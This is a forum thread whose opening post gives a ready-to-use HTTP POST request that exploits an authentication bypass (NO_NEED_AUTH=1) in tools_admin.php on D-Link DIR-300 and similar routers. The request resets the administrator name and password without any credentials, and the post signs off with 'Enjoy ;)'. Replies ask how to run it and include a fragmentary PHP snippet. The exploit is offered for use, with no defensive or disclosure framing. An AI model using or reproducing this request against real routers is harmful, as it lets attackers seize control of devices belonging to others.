![]() |
Change D-Link DIR-300 (and others) routers password
Control panel script - tools_admin.php allows attacker to change
administrator name, password and other variables without any authorization by sending specially crafted http post request such as: ---cut here--- POST http://192.168.1.1:80/tools_admin.php HTTP/1.1 Host: 192.168.1.2 Keep-Alive: 115 Content-Type: application/x-www-form-urlencoded Content-length: 0 ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&logi n=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name= admin&admin_password1=uhOHahEh ---cut here--- Enjoy ;) |
hey thanks for the post !
byut how to use it ? where to save it ? to what extension ? |
Quote:
Code:
<?php |
can you do that please?
|
Quote:
|
| All times are GMT +1. The time now is 10:10 AM. |
Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Ad Management plugin by RedTyger